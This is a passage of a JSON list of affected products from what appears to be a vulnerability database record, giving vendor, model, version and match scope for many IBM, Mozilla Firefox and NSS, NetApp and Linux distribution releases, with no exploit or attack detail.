"ibm", "version": "8.5.5.4" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.10" }, { "model": "ccr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.2" }, { "model": "vasa provider for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.19" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.6" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.1" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.3" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "watson explorer annotation administration console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.12" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "integrated management module ii for bladecenter 1aoo", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.4.1" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.0" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.6" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.2" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.35" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.32" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.6" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.12" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "websphere real time sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3920" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "websphere mq internet pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "ftm for cps", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.1" }, { "model": "explorer for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.0.1" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.2.01" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "sterling secure proxy ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "bigfix security compliance analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0.2" }, { "model": "spss modeler fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.4" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.71" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "35.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.5" }, { "model": "operations analytics predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.3.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1100" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "si4093 image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.0.0.2" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "websphere application server for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.14" }, { "model": "system networking rackswitch g8332", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.7.22.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.1" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "9.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.111" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "websphere real time sr fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3930" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.4" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.9" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "fabric operating system 7.4.1a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0.0.3" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.15" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.3" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "ds8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "decision optimization center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.2" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.6" }, { "model": "tivoli composite application manager for soa", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rlks lkad borrow tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "39.0.3" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2-4" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35001.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "integration toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.41" }, { "model": "flashsystem 9846-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.020" }, { "model": "bundle of g8264cs image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14.2" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "security guardium data redaction", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.01" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.4" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "13.0.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.17" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "ilog optimization decision manager enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.7.0.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1.5" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.21" }, { "model": "watson explorer annotation administration console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.2" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "spss modeler fp3 if013", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.3" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.7" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.802" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.17.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "b-type san switches", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spss modeler fp2 if001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.2" }, { "model": "network security services", "scope": "ne", "trust": 0.3, "vendor": "mozilla", "version": "3.20.2" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.8" }, { "model": "plug-in for symantec netbackup", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "websphere mq internet pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.12" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "purepower integrated manager kvm host", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.9" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.5.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.3.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1.1" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.1" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.404" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.12" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "20.0.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.16" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.01" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1000" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.4.1" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.7" }, { "model": "decision optimization center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "db2 recovery expert for linux unix and windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "spss modeler fp3 if028", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "14.2" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.19" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.8" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": 